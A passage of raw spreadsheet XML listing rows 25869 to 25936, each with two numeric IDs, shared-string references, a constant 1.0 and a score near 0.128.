      <c r="A25869" s="1">
        <v>23430.0</v>
      </c>
      <c r="B25869" s="2">
        <v>5.6457248E7</v>
      </c>
      <c r="C25869" s="2" t="s">
        <v>24875</v>
      </c>
      <c r="D25869" s="2">
        <v>1.0</v>
      </c>
      <c r="E25869" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25869" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="25870" ht="15.75" customHeight="1">
      <c r="A25870" s="1">
        <v>3926.0</v>
      </c>
      <c r="B25870" s="2">
        <v>4.0562334E7</v>
      </c>
      <c r="C25870" s="2" t="s">
        <v>24876</v>
      </c>
      <c r="D25870" s="2">
        <v>1.0</v>
      </c>
      <c r="E25870" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25870" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="25871" ht="15.75" customHeight="1">
      <c r="A25871" s="1">
        <v>13896.0</v>
      </c>
      <c r="B25871" s="2">
        <v>3.703677E7</v>
      </c>
      <c r="C25871" s="2" t="s">
        <v>24877</v>
      </c>
      <c r="D25871" s="2">
        <v>1.0</v>
      </c>
      <c r="E25871" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25871" s="2">
        <v>0.1282828282828283</v>
      </c>
    </row>
    <row r="25872" ht="15.75" customHeight="1">
      <c r="A25872" s="1">
        <v>20430.0</v>
      </c>
      <c r="B25872" s="2">
        <v>1.2328477E7</v>
      </c>
      <c r="C25872" s="2" t="s">
        <v>24878</v>
      </c>
      <c r="D25872" s="2">
        <v>1.0</v>
      </c>
      <c r="E25872" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25872" s="2">
        <v>0.1282828282828283</v>
      </c>
    </row>
    <row r="25873" ht="15.75" customHeight="1">
      <c r="A25873" s="1">
        <v>31334.0</v>
      </c>
      <c r="B25873" s="2">
        <v>4976390.0</v>
      </c>
      <c r="C25873" s="2" t="s">
        <v>24879</v>
      </c>
      <c r="D25873" s="2">
        <v>1.0</v>
      </c>
      <c r="E25873" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25873" s="2">
        <v>0.1282828282828283</v>
      </c>
    </row>
    <row r="25874" ht="15.75" customHeight="1">
      <c r="A25874" s="1">
        <v>11487.0</v>
      </c>
      <c r="B25874" s="2">
        <v>2.203365E7</v>
      </c>
      <c r="C25874" s="2" t="s">
        <v>24880</v>
      </c>
      <c r="D25874" s="2">
        <v>1.0</v>
      </c>
      <c r="E25874" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25874" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="25875" ht="15.75" customHeight="1">
      <c r="A25875" s="1">
        <v>14969.0</v>
      </c>
      <c r="B25875" s="2">
        <v>4.1351487E7</v>
      </c>
      <c r="C25875" s="2" t="s">
        <v>24881</v>
      </c>
      <c r="D25875" s="2">
        <v>1.0</v>
      </c>
      <c r="E25875" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25875" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="25876" ht="15.75" customHeight="1">
      <c r="A25876" s="1">
        <v>20764.0</v>
      </c>
      <c r="B25876" s="2">
        <v>1.4950705E7</v>
      </c>
      <c r="C25876" s="2" t="s">
        <v>24882</v>
      </c>
      <c r="D25876" s="2">
        <v>1.0</v>
      </c>
      <c r="E25876" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25876" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="25877" ht="15.75" customHeight="1">
      <c r="A25877" s="1">
        <v>32243.0</v>
      </c>
      <c r="B25877" s="2">
        <v>5503812.0</v>
      </c>
      <c r="C25877" s="2" t="s">
        <v>24883</v>
      </c>
      <c r="D25877" s="2">
        <v>1.0</v>
      </c>
      <c r="E25877" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25877" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="25878" ht="15.75" customHeight="1">
      <c r="A25878" s="1">
        <v>34138.0</v>
      </c>
      <c r="B25878" s="2">
        <v>9801632.0</v>
      </c>
      <c r="C25878" s="2" t="s">
        <v>24884</v>
      </c>
      <c r="D25878" s="2">
        <v>1.0</v>
      </c>
      <c r="E25878" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25878" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="25879" ht="15.75" customHeight="1">
      <c r="A25879" s="1">
        <v>21322.0</v>
      </c>
      <c r="B25879" s="2">
        <v>2.0935884E7</v>
      </c>
      <c r="C25879" s="2" t="s">
        <v>24885</v>
      </c>
      <c r="D25879" s="2">
        <v>1.0</v>
      </c>
      <c r="E25879" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25879" s="2">
        <v>0.1282679738562092</v>
      </c>
    </row>
    <row r="25880" ht="15.75" customHeight="1">
      <c r="A25880" s="1">
        <v>8238.0</v>
      </c>
      <c r="B25880" s="2">
        <v>5.3357553E7</v>
      </c>
      <c r="C25880" s="2" t="s">
        <v>24886</v>
      </c>
      <c r="D25880" s="2">
        <v>1.0</v>
      </c>
      <c r="E25880" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25880" s="2">
        <v>0.1281362007168459</v>
      </c>
    </row>
    <row r="25881" ht="15.75" customHeight="1">
      <c r="A25881" s="1">
        <v>22271.0</v>
      </c>
      <c r="B25881" s="2">
        <v>3.3165211E7</v>
      </c>
      <c r="C25881" s="2" t="s">
        <v>24887</v>
      </c>
      <c r="D25881" s="2">
        <v>1.0</v>
      </c>
      <c r="E25881" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25881" s="2">
        <v>0.1281362007168459</v>
      </c>
    </row>
    <row r="25882" ht="15.75" customHeight="1">
      <c r="A25882" s="1">
        <v>2306.0</v>
      </c>
      <c r="B25882" s="2">
        <v>3.2734895E7</v>
      </c>
      <c r="C25882" s="2" t="s">
        <v>24888</v>
      </c>
      <c r="D25882" s="2">
        <v>1.0</v>
      </c>
      <c r="E25882" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25882" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25883" ht="15.75" customHeight="1">
      <c r="A25883" s="1">
        <v>6886.0</v>
      </c>
      <c r="B25883" s="2">
        <v>4.9763015E7</v>
      </c>
      <c r="C25883" s="2" t="s">
        <v>24889</v>
      </c>
      <c r="D25883" s="2">
        <v>1.0</v>
      </c>
      <c r="E25883" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25883" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25884" ht="15.75" customHeight="1">
      <c r="A25884" s="1">
        <v>10021.0</v>
      </c>
      <c r="B25884" s="2">
        <v>5.7052515E7</v>
      </c>
      <c r="C25884" s="2" t="s">
        <v>24890</v>
      </c>
      <c r="D25884" s="2">
        <v>1.0</v>
      </c>
      <c r="E25884" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25884" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25885" ht="15.75" customHeight="1">
      <c r="A25885" s="1">
        <v>10294.0</v>
      </c>
      <c r="B25885" s="2">
        <v>5.7647027E7</v>
      </c>
      <c r="C25885" s="2" t="s">
        <v>24891</v>
      </c>
      <c r="D25885" s="2">
        <v>1.0</v>
      </c>
      <c r="E25885" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25885" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25886" ht="15.75" customHeight="1">
      <c r="A25886" s="1">
        <v>11420.0</v>
      </c>
      <c r="B25886" s="2">
        <v>2.1697408E7</v>
      </c>
      <c r="C25886" s="2" t="s">
        <v>24892</v>
      </c>
      <c r="D25886" s="2">
        <v>1.0</v>
      </c>
      <c r="E25886" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25886" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25887" ht="15.75" customHeight="1">
      <c r="A25887" s="1">
        <v>12732.0</v>
      </c>
      <c r="B25887" s="2">
        <v>3.1009735E7</v>
      </c>
      <c r="C25887" s="5" t="s">
        <v>24893</v>
      </c>
      <c r="D25887" s="2">
        <v>1.0</v>
      </c>
      <c r="E25887" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25887" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25888" ht="15.75" customHeight="1">
      <c r="A25888" s="1">
        <v>13430.0</v>
      </c>
      <c r="B25888" s="2">
        <v>3.5094261E7</v>
      </c>
      <c r="C25888" s="2" t="s">
        <v>24894</v>
      </c>
      <c r="D25888" s="2">
        <v>1.0</v>
      </c>
      <c r="E25888" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25888" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25889" ht="15.75" customHeight="1">
      <c r="A25889" s="1">
        <v>13929.0</v>
      </c>
      <c r="B25889" s="2">
        <v>3.7105453E7</v>
      </c>
      <c r="C25889" s="2" t="s">
        <v>24895</v>
      </c>
      <c r="D25889" s="2">
        <v>1.0</v>
      </c>
      <c r="E25889" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25889" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25890" ht="15.75" customHeight="1">
      <c r="A25890" s="1">
        <v>15985.0</v>
      </c>
      <c r="B25890" s="2">
        <v>4.491585E7</v>
      </c>
      <c r="C25890" s="2" t="s">
        <v>24896</v>
      </c>
      <c r="D25890" s="2">
        <v>1.0</v>
      </c>
      <c r="E25890" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25890" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25891" ht="15.75" customHeight="1">
      <c r="A25891" s="1">
        <v>16861.0</v>
      </c>
      <c r="B25891" s="2">
        <v>4.7939787E7</v>
      </c>
      <c r="C25891" s="2" t="s">
        <v>24897</v>
      </c>
      <c r="D25891" s="2">
        <v>1.0</v>
      </c>
      <c r="E25891" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25891" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25892" ht="15.75" customHeight="1">
      <c r="A25892" s="1">
        <v>17349.0</v>
      </c>
      <c r="B25892" s="2">
        <v>4.9424886E7</v>
      </c>
      <c r="C25892" s="2" t="s">
        <v>24898</v>
      </c>
      <c r="D25892" s="2">
        <v>1.0</v>
      </c>
      <c r="E25892" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25892" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25893" ht="15.75" customHeight="1">
      <c r="A25893" s="1">
        <v>17911.0</v>
      </c>
      <c r="B25893" s="2">
        <v>5.1129864E7</v>
      </c>
      <c r="C25893" s="2" t="s">
        <v>24899</v>
      </c>
      <c r="D25893" s="2">
        <v>1.0</v>
      </c>
      <c r="E25893" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25893" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25894" ht="15.75" customHeight="1">
      <c r="A25894" s="1">
        <v>19501.0</v>
      </c>
      <c r="B25894" s="2">
        <v>5.5908609E7</v>
      </c>
      <c r="C25894" s="2" t="s">
        <v>24900</v>
      </c>
      <c r="D25894" s="2">
        <v>1.0</v>
      </c>
      <c r="E25894" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25894" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25895" ht="15.75" customHeight="1">
      <c r="A25895" s="1">
        <v>20425.0</v>
      </c>
      <c r="B25895" s="2">
        <v>1.2311293E7</v>
      </c>
      <c r="C25895" s="2" t="s">
        <v>24901</v>
      </c>
      <c r="D25895" s="2">
        <v>1.0</v>
      </c>
      <c r="E25895" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25895" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25896" ht="15.75" customHeight="1">
      <c r="A25896" s="1">
        <v>20698.0</v>
      </c>
      <c r="B25896" s="2">
        <v>1.4524835E7</v>
      </c>
      <c r="C25896" s="2" t="s">
        <v>24902</v>
      </c>
      <c r="D25896" s="2">
        <v>1.0</v>
      </c>
      <c r="E25896" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25896" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25897" ht="15.75" customHeight="1">
      <c r="A25897" s="1">
        <v>21016.0</v>
      </c>
      <c r="B25897" s="2">
        <v>1.7327791E7</v>
      </c>
      <c r="C25897" s="2" t="s">
        <v>24903</v>
      </c>
      <c r="D25897" s="2">
        <v>1.0</v>
      </c>
      <c r="E25897" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25897" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25898" ht="15.75" customHeight="1">
      <c r="A25898" s="1">
        <v>21705.0</v>
      </c>
      <c r="B25898" s="2">
        <v>2.527977E7</v>
      </c>
      <c r="C25898" s="2" t="s">
        <v>24904</v>
      </c>
      <c r="D25898" s="2">
        <v>1.0</v>
      </c>
      <c r="E25898" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25898" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25899" ht="15.75" customHeight="1">
      <c r="A25899" s="1">
        <v>21889.0</v>
      </c>
      <c r="B25899" s="2">
        <v>2.7784894E7</v>
      </c>
      <c r="C25899" s="2" t="s">
        <v>24905</v>
      </c>
      <c r="D25899" s="2">
        <v>1.0</v>
      </c>
      <c r="E25899" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25899" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25900" ht="15.75" customHeight="1">
      <c r="A25900" s="1">
        <v>21947.0</v>
      </c>
      <c r="B25900" s="2">
        <v>2.8777607E7</v>
      </c>
      <c r="C25900" s="2" t="s">
        <v>24906</v>
      </c>
      <c r="D25900" s="2">
        <v>1.0</v>
      </c>
      <c r="E25900" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25900" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25901" ht="15.75" customHeight="1">
      <c r="A25901" s="1">
        <v>21972.0</v>
      </c>
      <c r="B25901" s="2">
        <v>2.9163587E7</v>
      </c>
      <c r="C25901" s="2" t="s">
        <v>24907</v>
      </c>
      <c r="D25901" s="2">
        <v>1.0</v>
      </c>
      <c r="E25901" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25901" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25902" ht="15.75" customHeight="1">
      <c r="A25902" s="1">
        <v>22317.0</v>
      </c>
      <c r="B25902" s="2">
        <v>3.3952723E7</v>
      </c>
      <c r="C25902" s="2" t="s">
        <v>24908</v>
      </c>
      <c r="D25902" s="2">
        <v>1.0</v>
      </c>
      <c r="E25902" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25902" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25903" ht="15.75" customHeight="1">
      <c r="A25903" s="1">
        <v>22538.0</v>
      </c>
      <c r="B25903" s="2">
        <v>3.7987257E7</v>
      </c>
      <c r="C25903" s="2" t="s">
        <v>24909</v>
      </c>
      <c r="D25903" s="2">
        <v>1.0</v>
      </c>
      <c r="E25903" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25903" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25904" ht="15.75" customHeight="1">
      <c r="A25904" s="1">
        <v>22606.0</v>
      </c>
      <c r="B25904" s="2">
        <v>3.9708661E7</v>
      </c>
      <c r="C25904" s="2" t="s">
        <v>24910</v>
      </c>
      <c r="D25904" s="2">
        <v>1.0</v>
      </c>
      <c r="E25904" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25904" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25905" ht="15.75" customHeight="1">
      <c r="A25905" s="1">
        <v>22867.0</v>
      </c>
      <c r="B25905" s="2">
        <v>4.7437056E7</v>
      </c>
      <c r="C25905" s="2" t="s">
        <v>24911</v>
      </c>
      <c r="D25905" s="2">
        <v>1.0</v>
      </c>
      <c r="E25905" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25905" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25906" ht="15.75" customHeight="1">
      <c r="A25906" s="1">
        <v>22896.0</v>
      </c>
      <c r="B25906" s="2">
        <v>4.7946172E7</v>
      </c>
      <c r="C25906" s="2" t="s">
        <v>24912</v>
      </c>
      <c r="D25906" s="2">
        <v>1.0</v>
      </c>
      <c r="E25906" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25906" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25907" ht="15.75" customHeight="1">
      <c r="A25907" s="1">
        <v>22974.0</v>
      </c>
      <c r="B25907" s="2">
        <v>4926401.0</v>
      </c>
      <c r="C25907" s="2" t="s">
        <v>24913</v>
      </c>
      <c r="D25907" s="2">
        <v>1.0</v>
      </c>
      <c r="E25907" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25907" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25908" ht="15.75" customHeight="1">
      <c r="A25908" s="1">
        <v>23042.0</v>
      </c>
      <c r="B25908" s="2">
        <v>5.0158112E7</v>
      </c>
      <c r="C25908" s="2" t="s">
        <v>24914</v>
      </c>
      <c r="D25908" s="2">
        <v>1.0</v>
      </c>
      <c r="E25908" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25908" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25909" ht="15.75" customHeight="1">
      <c r="A25909" s="1">
        <v>23539.0</v>
      </c>
      <c r="B25909" s="2">
        <v>5953885.0</v>
      </c>
      <c r="C25909" s="2" t="s">
        <v>24915</v>
      </c>
      <c r="D25909" s="2">
        <v>1.0</v>
      </c>
      <c r="E25909" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25909" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25910" ht="15.75" customHeight="1">
      <c r="A25910" s="1">
        <v>23830.0</v>
      </c>
      <c r="B25910" s="2">
        <v>8070597.0</v>
      </c>
      <c r="C25910" s="2" t="s">
        <v>24916</v>
      </c>
      <c r="D25910" s="2">
        <v>1.0</v>
      </c>
      <c r="E25910" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25910" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25911" ht="15.75" customHeight="1">
      <c r="A25911" s="1">
        <v>24585.0</v>
      </c>
      <c r="B25911" s="2">
        <v>1.1329898E7</v>
      </c>
      <c r="C25911" s="2" t="s">
        <v>24917</v>
      </c>
      <c r="D25911" s="2">
        <v>1.0</v>
      </c>
      <c r="E25911" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25911" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25912" ht="15.75" customHeight="1">
      <c r="A25912" s="1">
        <v>26233.0</v>
      </c>
      <c r="B25912" s="2">
        <v>1.6282675E7</v>
      </c>
      <c r="C25912" s="2" t="s">
        <v>24918</v>
      </c>
      <c r="D25912" s="2">
        <v>1.0</v>
      </c>
      <c r="E25912" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25912" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25913" ht="15.75" customHeight="1">
      <c r="A25913" s="1">
        <v>26237.0</v>
      </c>
      <c r="B25913" s="2">
        <v>1.6282675E7</v>
      </c>
      <c r="C25913" s="2" t="s">
        <v>24919</v>
      </c>
      <c r="D25913" s="2">
        <v>1.0</v>
      </c>
      <c r="E25913" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25913" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25914" ht="15.75" customHeight="1">
      <c r="A25914" s="1">
        <v>26461.0</v>
      </c>
      <c r="B25914" s="2">
        <v>1.732779E7</v>
      </c>
      <c r="C25914" s="2" t="s">
        <v>24903</v>
      </c>
      <c r="D25914" s="2">
        <v>1.0</v>
      </c>
      <c r="E25914" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25914" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25915" ht="15.75" customHeight="1">
      <c r="A25915" s="1">
        <v>28306.0</v>
      </c>
      <c r="B25915" s="2">
        <v>2.5646798E7</v>
      </c>
      <c r="C25915" s="2" t="s">
        <v>24920</v>
      </c>
      <c r="D25915" s="2">
        <v>1.0</v>
      </c>
      <c r="E25915" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25915" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25916" ht="15.75" customHeight="1">
      <c r="A25916" s="1">
        <v>28820.0</v>
      </c>
      <c r="B25916" s="2">
        <v>2.8777606E7</v>
      </c>
      <c r="C25916" s="2" t="s">
        <v>24906</v>
      </c>
      <c r="D25916" s="2">
        <v>1.0</v>
      </c>
      <c r="E25916" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25916" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25917" ht="15.75" customHeight="1">
      <c r="A25917" s="1">
        <v>28877.0</v>
      </c>
      <c r="B25917" s="2">
        <v>2.9163586E7</v>
      </c>
      <c r="C25917" s="2" t="s">
        <v>24907</v>
      </c>
      <c r="D25917" s="2">
        <v>1.0</v>
      </c>
      <c r="E25917" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25917" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25918" ht="15.75" customHeight="1">
      <c r="A25918" s="1">
        <v>29605.0</v>
      </c>
      <c r="B25918" s="2">
        <v>3.3569834E7</v>
      </c>
      <c r="C25918" s="2" t="s">
        <v>24921</v>
      </c>
      <c r="D25918" s="2">
        <v>1.0</v>
      </c>
      <c r="E25918" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25918" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25919" ht="15.75" customHeight="1">
      <c r="A25919" s="1">
        <v>30440.0</v>
      </c>
      <c r="B25919" s="2">
        <v>3.9107225E7</v>
      </c>
      <c r="C25919" s="2" t="s">
        <v>24922</v>
      </c>
      <c r="D25919" s="2">
        <v>1.0</v>
      </c>
      <c r="E25919" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25919" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25920" ht="15.75" customHeight="1">
      <c r="A25920" s="1">
        <v>30961.0</v>
      </c>
      <c r="B25920" s="2">
        <v>4.7437055E7</v>
      </c>
      <c r="C25920" s="2" t="s">
        <v>24911</v>
      </c>
      <c r="D25920" s="2">
        <v>1.0</v>
      </c>
      <c r="E25920" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25920" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25921" ht="15.75" customHeight="1">
      <c r="A25921" s="1">
        <v>31216.0</v>
      </c>
      <c r="B25921" s="2">
        <v>4926400.0</v>
      </c>
      <c r="C25921" s="2" t="s">
        <v>24913</v>
      </c>
      <c r="D25921" s="2">
        <v>1.0</v>
      </c>
      <c r="E25921" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25921" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25922" ht="15.75" customHeight="1">
      <c r="A25922" s="1">
        <v>31292.0</v>
      </c>
      <c r="B25922" s="2">
        <v>4962681.0</v>
      </c>
      <c r="C25922" s="2" t="s">
        <v>24923</v>
      </c>
      <c r="D25922" s="2">
        <v>1.0</v>
      </c>
      <c r="E25922" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25922" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25923" ht="15.75" customHeight="1">
      <c r="A25923" s="1">
        <v>31391.0</v>
      </c>
      <c r="B25923" s="2">
        <v>4998403.0</v>
      </c>
      <c r="C25923" s="2" t="s">
        <v>24924</v>
      </c>
      <c r="D25923" s="2">
        <v>1.0</v>
      </c>
      <c r="E25923" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25923" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25924" ht="15.75" customHeight="1">
      <c r="A25924" s="1">
        <v>31842.0</v>
      </c>
      <c r="B25924" s="2">
        <v>5273629.0</v>
      </c>
      <c r="C25924" s="2" t="s">
        <v>24925</v>
      </c>
      <c r="D25924" s="2">
        <v>1.0</v>
      </c>
      <c r="E25924" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25924" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25925" ht="15.75" customHeight="1">
      <c r="A25925" s="1">
        <v>32538.0</v>
      </c>
      <c r="B25925" s="2">
        <v>5739951.0</v>
      </c>
      <c r="C25925" s="2" t="s">
        <v>24926</v>
      </c>
      <c r="D25925" s="2">
        <v>1.0</v>
      </c>
      <c r="E25925" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25925" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25926" ht="15.75" customHeight="1">
      <c r="A25926" s="1">
        <v>32743.0</v>
      </c>
      <c r="B25926" s="2">
        <v>6036317.0</v>
      </c>
      <c r="C25926" s="2" t="s">
        <v>24927</v>
      </c>
      <c r="D25926" s="2">
        <v>1.0</v>
      </c>
      <c r="E25926" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25926" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25927" ht="15.75" customHeight="1">
      <c r="A25927" s="1">
        <v>32916.0</v>
      </c>
      <c r="B25927" s="2">
        <v>6409483.0</v>
      </c>
      <c r="C25927" s="2" t="s">
        <v>24928</v>
      </c>
      <c r="D25927" s="2">
        <v>1.0</v>
      </c>
      <c r="E25927" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25927" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25928" ht="15.75" customHeight="1">
      <c r="A25928" s="1">
        <v>33308.0</v>
      </c>
      <c r="B25928" s="2">
        <v>7507856.0</v>
      </c>
      <c r="C25928" s="2" t="s">
        <v>24929</v>
      </c>
      <c r="D25928" s="2">
        <v>1.0</v>
      </c>
      <c r="E25928" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25928" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25929" ht="15.75" customHeight="1">
      <c r="A25929" s="1">
        <v>33505.0</v>
      </c>
      <c r="B25929" s="2">
        <v>8070596.0</v>
      </c>
      <c r="C25929" s="2" t="s">
        <v>24916</v>
      </c>
      <c r="D25929" s="2">
        <v>1.0</v>
      </c>
      <c r="E25929" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25929" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25930" ht="15.75" customHeight="1">
      <c r="A25930" s="1">
        <v>33743.0</v>
      </c>
      <c r="B25930" s="2">
        <v>8556674.0</v>
      </c>
      <c r="C25930" s="2" t="s">
        <v>24929</v>
      </c>
      <c r="D25930" s="2">
        <v>1.0</v>
      </c>
      <c r="E25930" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25930" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25931" ht="15.75" customHeight="1">
      <c r="A25931" s="1">
        <v>34145.0</v>
      </c>
      <c r="B25931" s="2">
        <v>9847108.0</v>
      </c>
      <c r="C25931" s="2" t="s">
        <v>24930</v>
      </c>
      <c r="D25931" s="2">
        <v>1.0</v>
      </c>
      <c r="E25931" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25931" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="25932" ht="15.75" customHeight="1">
      <c r="A25932" s="1">
        <v>1618.0</v>
      </c>
      <c r="B25932" s="2">
        <v>2.7845536E7</v>
      </c>
      <c r="C25932" s="2" t="s">
        <v>24931</v>
      </c>
      <c r="D25932" s="2">
        <v>1.0</v>
      </c>
      <c r="E25932" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25932" s="2">
        <v>0.1278659611992946</v>
      </c>
    </row>
    <row r="25933" ht="15.75" customHeight="1">
      <c r="A25933" s="1">
        <v>3271.0</v>
      </c>
      <c r="B25933" s="2">
        <v>3.7473625E7</v>
      </c>
      <c r="C25933" s="2" t="s">
        <v>24932</v>
      </c>
      <c r="D25933" s="2">
        <v>1.0</v>
      </c>
      <c r="E25933" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25933" s="2">
        <v>0.1278659611992946</v>
      </c>
    </row>
    <row r="25934" ht="15.75" customHeight="1">
      <c r="A25934" s="1">
        <v>10081.0</v>
      </c>
      <c r="B25934" s="2">
        <v>5.7157164E7</v>
      </c>
      <c r="C25934" s="2" t="s">
        <v>24933</v>
      </c>
      <c r="D25934" s="2">
        <v>1.0</v>
      </c>
      <c r="E25934" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25934" s="2">
        <v>0.1278659611992946</v>
      </c>
    </row>
    <row r="25935" ht="15.75" customHeight="1">
      <c r="A25935" s="1">
        <v>16366.0</v>
      </c>
      <c r="B25935" s="2">
        <v>4.6135812E7</v>
      </c>
      <c r="C25935" s="2" t="s">
        <v>24934</v>
      </c>
      <c r="D25935" s="2">
        <v>1.0</v>
      </c>
      <c r="E25935" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25935" s="2">
        <v>0.1276803118908382</v>
      </c>
    </row>
    <row r="25936" ht="15.75" customHeight="1">
      <c r="A25936" s="1">
        <v>20576.0</v>
      </c>
